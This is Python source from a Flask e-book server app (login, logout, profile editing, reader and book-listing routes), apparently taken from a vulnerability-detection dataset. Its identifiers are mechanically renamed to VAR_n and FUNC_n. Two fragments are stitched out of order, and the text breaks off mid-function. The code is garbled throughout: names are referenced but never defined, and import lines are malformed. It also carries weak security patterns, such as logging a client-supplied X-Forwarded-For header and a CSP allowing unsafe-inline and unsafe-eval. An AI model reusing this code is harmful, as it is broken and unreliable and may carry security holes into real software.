if config.config_login_type == constants.LOGIN_LDAP and services.ldap and VAR_104 and VAR_117['password'] != "":
VAR_138, VAR_139 = services.ldap.bind_user(VAR_117['username'], VAR_117['password'])
if VAR_138:
login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
ub.store_user_session()
VAR_3.debug(u"You are now logged in as: '%s'", VAR_104.name)
flash(_(u"you are now logged in as: '%(VAR_115)s'", VAR_115=VAR_104.name),
category="success")
return redirect_back(url_for("web.index"))
elif VAR_138 is None and VAR_104 and check_password_hash(str(VAR_104.password), VAR_117['password']) \
and VAR_104.name != "Guest":
login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
ub.store_user_session()
VAR_3.info("Local Fallback Login as: '%s'", VAR_104.name)
flash(_(u"Fallback Login as: '%(VAR_115)s', LDAP Server not reachable, or VAR_104 not known",
VAR_115=VAR_104.name),
category="warning")
return redirect_back(url_for("web.index"))
elif VAR_138 is None:
VAR_3.info(VAR_139)
flash(_(u"Could not FUNC_65: %(message)s", message=VAR_139), category="error")
else:
VAR_140 = request.headers.get('X-Forwarded-For', request.remote_addr)
VAR_3.warning('LDAP Login failed for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
flash(_(u"Wrong Username or Password"), category="error")
else:
VAR_140 = request.headers.get('X-Forwarded-For', request.remote_addr)
if 'forgot' in VAR_117 and VAR_117['forgot'] == 'forgot':
if VAR_104 != None and VAR_104.name != "Guest":
VAR_147, VAR_64 = reset_password(VAR_104.id)
if VAR_147 == 1:
flash(_(u"New Password was send to your VAR_136 address"), category="info")
VAR_3.info('Password reset for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
else:
VAR_3.error(u"An unknown VAR_139 occurred. Please try again later")
flash(_(u"An unknown VAR_139 occurred. Please try again later."), category="error")
else:
flash(_(u"Please enter valid username to reset password"), category="error")
VAR_3.warning('Username missing for VAR_137 reset IP-address: %s', VAR_140)
else:
if VAR_104 and check_password_hash(str(VAR_104.password), VAR_117['password']) and VAR_104.name != "Guest":
login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
ub.store_user_session()
VAR_3.debug(u"You are now logged in as: '%s'", VAR_104.name)
flash(_(u"You are now logged in as: '%(VAR_115)s'", VAR_115=VAR_104.name), category="success")
config.config_is_initial = False
return redirect_back(url_for("web.index"))
else:
VAR_3.warning('Login failed for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
flash(_(u"Wrong Username or Password"), category="error")
VAR_97 = request.args.get('next', default=url_for("web.index"), type=str)
if url_for("web.logout") == VAR_97:
next_url = url_for("web.index")
return render_title_template('login.html',
VAR_149=_(u"Login"),
VAR_97=next_url,
config=config,
VAR_100=oauth_check,
mail=config.get_mail_server_configured(), VAR_9="login")
@VAR_2.route('/logout')
@login_required
def FUNC_66():
if VAR_87 is not None and VAR_87.is_authenticated:
ub.delete_user_session(VAR_87.id, VAR_91.get('_id',""))
logout_user()
if VAR_0['oauth'] and (config.config_login_type == 2 or config.config_login_type == 3):
logout_oauth_user()
VAR_3.debug(u"User logged out")
return redirect(url_for('web.login'))
def FUNC_67(VAR_44, VAR_45, VAR_46, VAR_47, VAR_48):
VAR_55 = request.form.to_dict()
VAR_87.random_books = 0
if VAR_87.role_passwd() or VAR_87.role_admin():
if VAR_55.get("password"):
VAR_87.password = generate_password_hash(VAR_55["password"])
try:
if VAR_55.get("kindle_mail", VAR_87.kindle_mail) != VAR_87.kindle_mail:
VAR_87.kindle_mail = valid_email(VAR_55["kindle_mail"])
if VAR_55.get("email", VAR_87.email) != VAR_87.email:
VAR_87.email = check_email(VAR_55["email"])
if VAR_87.role_admin():
if VAR_55.get("name", VAR_87.name) != VAR_87.name:
VAR_87.name = check_username(VAR_55["name"])
VAR_87.random_books = 1 if VAR_55.get("show_random") == "on" else 0
if VAR_55.get("default_language"):
VAR_87.default_language = VAR_55["default_language"]
if VAR_55.get("locale"):
VAR_87.locale = VAR_55["locale"]
VAR_87.kobo_only_shelves_sync = int(VAR_55.get("kobo_only_shelves_sync") == "on") or 0
except Exception as ex:
flash(str(ex), category="error")
return render_title_template("user_edit.html",
VAR_116=VAR_87,
VAR_47=translations,
FUNC_68=1,
VAR_48=languages,
VAR_149=_(u"%(VAR_13)s's profile", VAR_13=VAR_87.name),
VAR_9="me",
VAR_44=kobo_support,
registered_oauth=VAR_45,
VAR_46=oauth_status)
VAR_98 = 0
for key, VAR_64 in VAR_55.items():
if key.startswith('show'):
VAR_98 += int(key[5:])
VAR_87.sidebar_view = VAR_98
if VAR_55.get("Show_detail_random"):
VAR_87.sidebar_view += constants.DETAIL_RANDOM
try:
ub.session.commit()
flash(_(u"Profile updated"), category="success")
VAR_3.debug(u"Profile updated")
except IntegrityError:
ub.session.rollback()
flash(_(u"Found an existing account for this e-mail address"), category="error")
VAR_3.debug(u"Found an existing account for this e-mail address")
except OperationalError as e:
ub.session.rollback()
VAR_3.error("Database VAR_139: %s", e)
flash(_(u"Database VAR_139: %(error)s.", VAR_139=e), category="error")
@VAR_2.route("/me", methods=["GET", "POST"])
@login_required
def FUNC_68():
VAR_48 = calibre_db.speaking_language()
VAR_47 = babel.list_translations() + [LC('en')]
VAR_44 = VAR_0['kobo'] and config.config_kobo_sync
if VAR_0['oauth'] and config.config_login_type == 2:
VAR_46 = get_oauth_status()
VAR_45 = VAR_100
else:
VAR_46 = None
VAR_45 = {}
if request.method == "POST":
FUNC_67(VAR_44, VAR_45, VAR_46, VAR_47, VAR_48)
return render_title_template("user_edit.html",
VAR_47=translations,
FUNC_68=1,
VAR_48=languages,
VAR_116=VAR_87,
VAR_44=kobo_support,
VAR_149=_(u"%(VAR_13)s's profile", VAR_13=VAR_87.name),
VAR_9="me",
registered_oauth=VAR_45,
VAR_46=oauth_status)
@VAR_2.route("/read/<int:VAR_5>/<VAR_6>")
@login_required_if_no_ano
@FUNC_2
def FUNC_69(VAR_5, VAR_6):
VAR_95 = calibre_db.get_filtered_book(VAR_5)
if not VAR_95:
flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"), category="error")
VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
return redirect(url_for("web.index"))
FUNC_4 = None
if VAR_87.is_authenticated:
VAR_99 = ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(VAR_87.id),
ub.Bookmark.book_id == VAR_5,
ub.Bookmark.format == VAR_6.upper())).first()
if VAR_6.lower() == "epub":
VAR_3.debug(u"Start epub reader for %d", VAR_5)
return render_title_template('read.html', bookid=VAR_5, VAR_149=VAR_95.title, VAR_99=FUNC_4)
elif VAR_6.lower() == "pdf":
VAR_3.debug(u"Start pdf reader for %d", VAR_5)
return render_title_template('readpdf.html', pdffile=VAR_5, VAR_149=VAR_95.title)
elif VAR_6.lower() == "txt":
VAR_3.debug(u"Start txt reader for %d", VAR_5)
return render_title_template('readtxt.html', txtfile=VAR_5, VAR_149=VAR_95.title)
elif VAR_6.lower() == "djvu":
VAR_3.debug(u"Start djvu reader for %d", VAR_5)
return render_title_template('readdjvu.html', djvufile=VAR_5, VAR_149=VAR_95.title)
else:
for fileExt in constants.EXTENSIONS_AUDIO:
if VAR_6.lower() == fileExt:
VAR_63 = calibre_db.get_filtered_book(VAR_5)
VAR_3.debug(u"Start mp3 listening for %d", VAR_5)
return render_title_template('listenmp3.html', mp3file=VAR_5, audioformat=VAR_6.lower(),
entry=VAR_63, VAR_99=FUNC_4)
for fileExt in ["cbr", "cbt", "cbz"]:
if VAR_6.lower() == fileExt:
VAR_148 = str(VAR_5)
VAR_149 = VAR_95.title
if len(VAR_95.series):
VAR_149 = VAR_149 + " - " + VAR_95.series[0].name
if VAR_95.series_index:
VAR_149 = VAR_149 + " #" + '{0:.2f}'.format(VAR_95.series_index).rstrip('0').rstrip('.')
VAR_3.debug(u"Start comic reader for %d", VAR_5)
return render_title_template('readcbr.html', comicfile=VAR_148, VAR_149=title,
extension=fileExt)
VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
@VAR_2.route("/VAR_95/<int:VAR_5>")
@login_required_if_no_ano
def FUNC_70(VAR_5):
VAR_63 = calibre_db.get_filtered_book(VAR_5, allow_show_archived=True)
if VAR_63:
for FUNC_31 in range(0, len(VAR_63.languages)):
VAR_63.languages[FUNC_31].language_name = isoLanguages.get_language_name(get_locale(), VAR_63.languages[
FUNC_31].lang_code)
VAR_16 = get_cc_columns(filter_config_custom_read=True)
VAR_118 = []
VAR_119 = ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == VAR_5).all()
for entry in VAR_119:
VAR_118.append(entry.shelf)
if not VAR_87.is_anonymous:
if not config.config_read_column:
VAR_146 = ub.session.query(ub.ReadBook). \
filter(and_(ub.ReadBook.user_id == int(VAR_87.id), ub.ReadBook.book_id == VAR_5)).all()
VAR_142 = len(
VAR_146) > 0 and VAR_146[0].read_status == ub.ReadBook.STATUS_FINISHED
else:
try:
VAR_146 = getattr(VAR_63, 'custom_column_' + str(config.config_read_column))
VAR_142 = len(VAR_146) > 0 and VAR_146[0].value
except (KeyError, AttributeError):
VAR_3.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
VAR_142 = None
VAR_54 = ub.session.query(ub.ArchivedBook).\
filter(and_(ub.ArchivedBook.user_id == int(VAR_87.id),
ub.ArchivedBook.book_id == VAR_5)).first()
VAR_141 = VAR_54 and VAR_54.is_archived
else:
VAR_142 = None
VAR_141 = None
VAR_63.tags = VAR_7(VAR_63.tags, key=lambda tag: tag.name)
VAR_63 = calibre_db.order_authors(VAR_63)
VAR_120 = check_send_to_kindle(VAR_63)
VAR_121 = check_read_formats(VAR_63)
VAR_122 = []
for media_format in VAR_63.data:
if media_format.format.lower() in constants.EXTENSIONS_AUDIO:
VAR_122.append(media_format.format.lower())
return render_title_template('detail.html',
entry=VAR_63,
VAR_122=audioentries,
VAR_16=cc,
is_xhr=request.headers.get('X-Requested-With')=='XMLHttpRequest',
VAR_149=VAR_63.title,
books_shelfs=VAR_118,
VAR_142=have_read,
VAR_141=is_archived,
VAR_120=kindle_list,
VAR_121=reader_list,
VAR_9="book")
else:
VAR_3.debug(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible")
flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"),
category="error")
return redirect(url_for("web.index"))
|
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
import mimetypes
import chardet # dependency of requests
import copy
from babel.dates import .format_date
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, jsonify
from flask import request, redirect, send_from_directory, make_response, flash, abort, url_for
from flask import session as VAR_91
from flask_babel import gettext as _
from flask_login import .login_user, logout_user, login_required, VAR_87
from sqlalchemy.exc import IntegrityError, InvalidRequestError, OperationalError
from sqlalchemy.sql.expression import text, func, false, not_, and_, or_
from sqlalchemy.orm.attributes import .flag_modified
from sqlalchemy.sql.functions import coalesce
from .services.worker import WorkerThread
from werkzeug.datastructures import Headers
from werkzeug.security import generate_password_hash, check_password_hash
from . import constants, logger, isoLanguages, services
from . import babel, db, ub, config, get_locale, app
from . import calibre_db
from .gdriveutils import getFileFromEbooksFolder, do_gdrive_download
from .helper import check_valid_domain, render_task_status, check_email, check_username, \
get_cc_columns, get_book_cover, get_download_link, send_mail, generate_random_password, \
send_registration_mail, check_send_to_kindle, check_read_formats, tags_filters, reset_password, valid_email
from .pagination import Pagination
from .redirect import redirect_back
from .usermanagement import .login_required_if_no_ano
from .render_template import render_title_template
VAR_0 = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo)
}
try:
from .oauth_bb import .oauth_check, register_user_with_oauth, logout_oauth_user, get_oauth_status
VAR_0['oauth'] = True
except ImportError:
VAR_0['oauth'] = False
VAR_100 = {}
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
try:
from natsort import natsorted as VAR_7
except ImportError:
VAR_7 = sorted # Just use regular VAR_7 then, may cause issues with badly named pages in cbz/cbr files
@app.after_request
def FUNC_0(VAR_1):
VAR_1.headers['Content-Security-Policy'] = "default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' VAR_8:"
if request.endpoint == "editbook.edit_book":
VAR_1.headers['Content-Security-Policy'] += " *"
VAR_1.headers['X-Content-Type-Options'] = 'nosniff'
VAR_1.headers['X-Frame-Options'] = 'SAMEORIGIN'
VAR_1.headers['X-XSS-Protection'] = '1; mode=block'
VAR_1.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
return VAR_1
VAR_2 = Blueprint('web', __name__)
VAR_3 = logger.create()
def FUNC_1(VAR_4):
@wraps(VAR_4)
def FUNC_71(*VAR_49, **VAR_50):
if VAR_87.role_download():
return VAR_4(*VAR_49, **VAR_50)
abort(403)
return FUNC_71
def FUNC_2(VAR_4):
@wraps(VAR_4)
def FUNC_71(*VAR_49, **VAR_50):
if VAR_87.role_viewer():
return VAR_4(*VAR_49, **VAR_50)
abort(403)
return FUNC_71
@VAR_2.route("/ajax/emailstat")
@login_required
def FUNC_3():
VAR_51 = WorkerThread.getInstance().tasks
return jsonify(render_task_status(VAR_51))
@VAR_2.route("/ajax/VAR_99/<int:VAR_5>/<VAR_6>", methods=['POST'])
@login_required
def VAR_99(VAR_5, VAR_6):
VAR_52 = request.form["bookmark"]
ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(VAR_87.id),
ub.Bookmark.book_id == VAR_5,
ub.Bookmark.format == VAR_6)).delete()
if not VAR_52:
ub.session_commit()
return "", 204
VAR_53 = ub.Bookmark(VAR_11=VAR_87.id,
VAR_5=book_id,
format=VAR_6,
VAR_52=bookmark_key)
ub.session.merge(VAR_53)
ub.session_commit("Bookmark for VAR_104 {} in VAR_95 {} created".format(VAR_87.id, VAR_5))
return "", 201
@VAR_2.route("/ajax/toggleread/<int:VAR_5>", methods=['POST'])
@login_required
def FUNC_5(VAR_5):
if not config.config_read_column:
VAR_95 = ub.session.query(ub.ReadBook).filter(and_(ub.ReadBook.user_id == int(VAR_87.id),
ub.ReadBook.book_id == VAR_5)).first()
if VAR_95:
if VAR_95.read_status == ub.ReadBook.STATUS_FINISHED:
VAR_95.read_status = ub.ReadBook.STATUS_UNREAD
else:
VAR_95.read_status = ub.ReadBook.STATUS_FINISHED
else:
VAR_123 = ub.ReadBook(VAR_11=VAR_87.id, VAR_5 = book_id)
VAR_123.read_status = ub.ReadBook.STATUS_FINISHED
VAR_95 = VAR_123
if not VAR_95.kobo_reading_state:
VAR_124 = ub.KoboReadingState(VAR_11=VAR_87.id, VAR_5=book_id)
VAR_124.current_bookmark = ub.KoboBookmark()
VAR_124.statistics = ub.KoboStatistics()
VAR_95.kobo_reading_state = VAR_124
ub.session.merge(VAR_95)
ub.session_commit("Book {} readbit toggled".format(VAR_5))
else:
try:
calibre_db.update_title_sort(config)
VAR_95 = calibre_db.get_filtered_book(VAR_5)
VAR_26 = getattr(VAR_95, 'custom_column_' + str(config.config_read_column))
if len(VAR_26):
VAR_26[0].value = not VAR_26[0].value
calibre_db.session.commit()
else:
VAR_143 = db.cc_classes[config.config_read_column]
VAR_144 = VAR_143(value=1, VAR_95=VAR_5)
calibre_db.session.add(VAR_144)
calibre_db.session.commit()
except (KeyError, AttributeError):
VAR_3.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
return "Custom Column No.{} is not existing in calibre database".format(config.config_read_column), 400
except (OperationalError, InvalidRequestError) as e:
calibre_db.session.rollback()
VAR_3.error(u"Read status could not set: %e", e)
return "Read status could not set: {}".format(e), 400
return ""
@VAR_2.route("/ajax/togglearchived/<int:VAR_5>", methods=['POST'])
@login_required
def FUNC_6(VAR_5):
VAR_54 = ub.session.query(ub.ArchivedBook).filter(and_(ub.ArchivedBook.user_id == int(VAR_87.id),
ub.ArchivedBook.book_id == VAR_5)).first()
if VAR_54:
VAR_54.is_archived = not VAR_54.is_archived
VAR_54.last_modified = datetime.utcnow()
else:
VAR_54 = ub.ArchivedBook(VAR_11=VAR_87.id, VAR_5=book_id)
VAR_54.is_archived = True
ub.session.merge(VAR_54)
ub.session_commit("Book {} archivebit toggled".format(VAR_5))
return ""
@VAR_2.route("/ajax/view", methods=["POST"])
@login_required_if_no_ano
def FUNC_7():
VAR_55 = request.get_json()
try:
for VAR_113 in VAR_55:
for VAR_111 in VAR_55[VAR_113]:
VAR_87.set_view_property(VAR_113, VAR_111, VAR_55[VAR_113][VAR_111])
except Exception as ex:
VAR_3.error("Could not save view_settings: %r %r: %e", request, VAR_55, ex)
return "Invalid request", 400
return "1", 200
'''
@VAR_2.route("/ajax/getcomic/<int:VAR_5>/<VAR_6>/<int:VAR_9>")
@login_required
def get_comic_book(VAR_5, VAR_6, VAR_9):
VAR_95 = calibre_db.get_book(VAR_5)
if not VAR_95:
return "", 204
else:
for bookformat in VAR_95.data:
if bookformat.format.lower() == VAR_6.lower():
cbr_file = os.path.join(config.config_calibre_dir, VAR_95.path, bookformat.name) + "." + VAR_6
if VAR_6 in ("cbr", "rar"):
if VAR_0['rar'] == True:
rarfile.UNRAR_TOOL = config.config_rarfile_location
try:
rf = rarfile.RarFile(cbr_file)
names = VAR_7(rf.namelist())
extract = lambda VAR_9: rf.read(names[VAR_9])
except:
VAR_3.error('Unrar binary not found, or unable to decompress file %s', cbr_file)
return "", 204
else:
VAR_3.info('Unrar is not supported please install python rarfile extension')
return "", 204
elif VAR_6 in ("cbz", "zip"):
zf = zipfile.ZipFile(cbr_file)
names=VAR_7(zf.namelist())
extract = lambda VAR_9: zf.read(names[VAR_9])
elif VAR_6 in ("cbt", "tar"):
tf = tarfile.TarFile(cbr_file)
names=VAR_7(tf.getnames())
extract = lambda VAR_9: tf.extractfile(names[VAR_9]).read()
else:
VAR_3.error('unsupported comic format')
return "", 204
if sys.version_info.major >= 3:
b64 = codecs.encode(extract(VAR_9), 'base64').decode()
else:
b64 = extract(VAR_9).encode('base64')
ext = names[VAR_9].rpartition('.')[-1]
if ext not in ('png', 'gif', 'jpg', 'jpeg', 'webp'):
ext = 'png'
extractedfile="data:image/" + ext + ";base64," + b64
fileData={"name": names[VAR_9], "page":VAR_9, "last":len(names)-1, "content": extractedfile}
return make_response(json.dumps(fileData))
return "", 204
'''
@VAR_2.route("/get_authors_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_8():
return calibre_db.get_typeahead(db.Authors, request.args.get('q'), ('|', ','))
@VAR_2.route("/get_publishers_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_9():
return calibre_db.get_typeahead(db.Publishers, request.args.get('q'), ('|', ','))
@VAR_2.route("/get_tags_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_10():
return calibre_db.get_typeahead(db.Tags, request.args.get('q'), tag_filter=tags_filters())
@VAR_2.route("/get_series_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_11():
return calibre_db.get_typeahead(db.Series, request.args.get('q'))
@VAR_2.route("/get_languages_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_12():
VAR_56 = (request.args.get('q') or '').lower()
VAR_57 = isoLanguages.get_language_names(get_locale())
VAR_58 = [s for key, s in VAR_57.items() if s.lower().startswith(VAR_56.lower())]
if len(VAR_58) < 5:
VAR_63 = [s for key, s in VAR_57.items() if VAR_56 in s.lower()]
VAR_58.extend(VAR_63[0:(5 - len(VAR_58))])
entries_start = list(set(VAR_58))
VAR_59 = json.dumps([dict(VAR_13=r) for r in VAR_58[0:5]])
return VAR_59
@VAR_2.route("/get_matching_tags", methods=['GET'])
@login_required_if_no_ano
def FUNC_13():
VAR_60 = {'tags': []}
VAR_21 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters(True))
calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
VAR_61 = request.args.get('author_name') or ''
VAR_62 = request.args.get('book_title') or ''
VAR_29 = request.args.getlist('include_tag') or ''
VAR_30 = request.args.getlist('exclude_tag') or ''
VAR_21 = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + VAR_61 + "%")),
func.lower(db.Books.title).ilike("%" + VAR_62 + "%"))
if len(VAR_29) > 0:
for tag in VAR_29:
VAR_21 = q.filter(db.Books.tags.any(db.Tags.id == tag))
if len(VAR_30) > 0:
for tag in VAR_30:
VAR_21 = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
for VAR_95 in VAR_21:
for tag in VAR_95.tags:
if tag.id not in VAR_60['tags']:
VAR_60['tags'].append(tag.id)
VAR_59 = json.dumps(VAR_60)
return VAR_59
def FUNC_14(VAR_7, VAR_8):
VAR_10 = [db.Books.timestamp.desc()]
if VAR_7 == 'stored':
VAR_7 = VAR_87.get_view_property(VAR_8, 'stored')
else:
VAR_87.set_view_property(VAR_8, 'stored', VAR_7)
if VAR_7 == 'pubnew':
VAR_10 = [db.Books.pubdate.desc()]
if VAR_7 == 'pubold':
VAR_10 = [db.Books.pubdate]
if VAR_7 == 'abc':
VAR_10 = [db.Books.sort]
if VAR_7 == 'zyx':
VAR_10 = [db.Books.sort.desc()]
if VAR_7 == 'new':
VAR_10 = [db.Books.timestamp.desc()]
if VAR_7 == 'old':
VAR_10 = [db.Books.timestamp]
if VAR_7 == 'authaz':
VAR_10 = [db.Books.author_sort.asc(), db.Series.name, db.Books.series_index]
if VAR_7 == 'authza':
VAR_10 = [db.Books.author_sort.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
if VAR_7 == 'seriesasc':
VAR_10 = [db.Books.series_index.asc()]
if VAR_7 == 'seriesdesc':
VAR_10 = [db.Books.series_index.desc()]
return VAR_10
def FUNC_15(VAR_8, VAR_7, VAR_5, VAR_9):
VAR_10 = FUNC_14(VAR_7, VAR_8)
if VAR_8 == "rated":
return FUNC_16(VAR_9, VAR_5, VAR_10=order)
elif VAR_8 == "discover":
return FUNC_17(VAR_9, VAR_5)
elif VAR_8 == "unread":
return FUNC_27(VAR_9, False, VAR_10=order)
elif VAR_8 == "read":
return FUNC_27(VAR_9, True, VAR_10=order)
elif VAR_8 == "hot":
return FUNC_18(VAR_9)
elif VAR_8 == "download":
return FUNC_19(VAR_9, VAR_10, VAR_5)
elif VAR_8 == "author":
return FUNC_20(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "publisher":
return FUNC_21(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "series":
return FUNC_22(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "ratings":
return FUNC_23(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "formats":
return FUNC_24(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "category":
return FUNC_25(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "language":
return FUNC_26(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "archived":
return FUNC_28(VAR_9, VAR_10)
elif VAR_8 == "search":
VAR_17 = (request.args.get('query') or '')
VAR_18 = int(int(config.config_books_per_page) * (VAR_9 - 1))
return FUNC_30(VAR_17, VAR_18, VAR_10, config.config_books_per_page)
elif VAR_8 == "advsearch":
VAR_17 = json.loads(VAR_91['query'])
VAR_18 = int(int(config.config_books_per_page) * (VAR_9 - 1))
return FUNC_57(VAR_17, VAR_18, VAR_10, config.config_books_per_page)
else:
VAR_150 = VAR_8 or "newest"
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0, db.Books, True, VAR_10,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
VAR_149=_(u"Books"), VAR_9=VAR_150)
def FUNC_16(VAR_9, VAR_5, VAR_10):
if VAR_87.check_visibility(constants.SIDEBAR_BEST_RATED):
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.ratings.any(db.Ratings.rating > 9),
VAR_10,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
id=VAR_5, VAR_149=_(u"Top Rated Books"), VAR_9="rated")
else:
abort(404)
def FUNC_17(VAR_9, VAR_5):
if VAR_87.check_visibility(constants.SIDEBAR_RANDOM):
VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0, db.Books, True, [func.randomblob(2)])
VAR_65 = Pagination(1, config.config_books_per_page, config.config_books_per_page)
return render_title_template('discover.html', VAR_63=VAR_63, VAR_65=pagination, id=VAR_5,
VAR_149=_(u"Discover (Random Books)"), VAR_9="discover")
else:
abort(404)
def FUNC_18(VAR_9):
if VAR_87.check_visibility(constants.SIDEBAR_HOT):
if VAR_87.show_detail_random():
VAR_68 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.order_by(func.random()).limit(config.config_random_books)
else:
VAR_68 = false()
VAR_79 = int(int(config.config_books_per_page) * (VAR_9 - 1))
VAR_101 = ub.session.query(ub.Downloads, func.count(ub.Downloads.book_id)).order_by(
func.count(ub.Downloads.book_id).desc()).group_by(ub.Downloads.book_id)
VAR_102 = VAR_101.offset(VAR_79).limit(config.config_books_per_page)
VAR_63 = list()
for VAR_95 in VAR_102:
VAR_125 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).filter(
db.Books.id == VAR_95.Downloads.book_id).first()
if VAR_125:
VAR_63.append(VAR_125)
else:
ub.delete_download(VAR_95.Downloads.book_id)
VAR_103 = VAR_63.__len__()
VAR_65 = Pagination(VAR_9, config.config_books_per_page, VAR_103)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
VAR_149=_(u"Hot Books (Most Downloaded)"), VAR_9="hot")
else:
abort(404)
def FUNC_19(VAR_9, VAR_10, VAR_11):
if VAR_87.role_admin():
VAR_11 = int(VAR_11)
else:
VAR_11 = VAR_87.id
if VAR_87.check_visibility(constants.SIDEBAR_DOWNLOAD):
if VAR_87.show_detail_random():
VAR_68 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.order_by(func.random()).limit(config.config_random_books)
else:
VAR_68 = false()
VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9,
0,
db.Books,
ub.Downloads.user_id == VAR_11,
VAR_10,
ub.Downloads, db.Books.id == ub.Downloads.book_id)
for VAR_95 in VAR_63:
if not calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.filter(db.Books.id == VAR_95.id).first():
ub.delete_download(VAR_95.id)
VAR_104 = ub.session.query(ub.User).filter(ub.User.id == VAR_11).first()
return render_title_template('index.html',
VAR_68=random,
VAR_63=VAR_63,
VAR_65=pagination,
id=VAR_11,
VAR_149=_(u"Downloaded VAR_127 by %(VAR_104)s",VAR_104=VAR_104.name),
VAR_9="download")
else:
abort(404)
def FUNC_20(VAR_9, VAR_12, VAR_10):
VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.authors.any(db.Authors.id == VAR_12),
[VAR_10[0], db.Series.name, db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
if VAR_63 is None or not len(VAR_63):
flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"),
category="error")
return redirect(url_for("web.index"))
if constants.sqlalchemy_version2:
VAR_105 = calibre_db.session.get(db.Authors, VAR_12)
else:
VAR_105 = calibre_db.session.query(db.Authors).get(VAR_12)
VAR_36 = VAR_105.name.replace('|', ',')
VAR_66 = None
VAR_67 = []
if services.goodreads_support and config.config_use_goodreads:
VAR_66 = services.goodreads_support.get_author_info(VAR_36)
VAR_67 = services.goodreads_support.get_other_books(VAR_66, VAR_63)
return render_title_template('author.html', VAR_63=VAR_63, VAR_65=pagination, id=VAR_12,
VAR_149=_(u"Author: %(VAR_13)s", VAR_13=VAR_36), VAR_105=VAR_66,
VAR_67=other_books, VAR_9="author")
def FUNC_21(VAR_9, VAR_5, VAR_10):
VAR_38 = calibre_db.session.query(db.Publishers).filter(db.Publishers.id == VAR_5).first()
if VAR_38:
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.publishers.any(db.Publishers.id == VAR_5),
[db.Series.name, VAR_10[0], db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination, id=VAR_5,
VAR_149=_(u"Publisher: %(VAR_13)s", VAR_13=VAR_38.name), VAR_9="publisher")
else:
abort(404)
def FUNC_22(VAR_9, VAR_5, VAR_10):
VAR_13 = calibre_db.session.query(db.Series).filter(db.Series.id == VAR_5).first()
if VAR_13:
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.series.any(db.Series.id == VAR_5),
[VAR_10[0]])
return render_title_template('index.html', VAR_68=random, VAR_65=pagination, VAR_63=VAR_63, id=VAR_5,
VAR_149=_(u"Series: %(serie)s", serie=VAR_13.name), VAR_9="series")
else:
abort(404)
def FUNC_23(VAR_9, VAR_5, VAR_10):
VAR_13 = calibre_db.session.query(db.Ratings).filter(db.Ratings.id == VAR_5).first()
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.ratings.any(db.Ratings.id == VAR_5),
[VAR_10[0]])
if VAR_13 and VAR_13.rating <= 10:
return render_title_template('index.html', VAR_68=random, VAR_65=pagination, VAR_63=VAR_63, id=VAR_5,
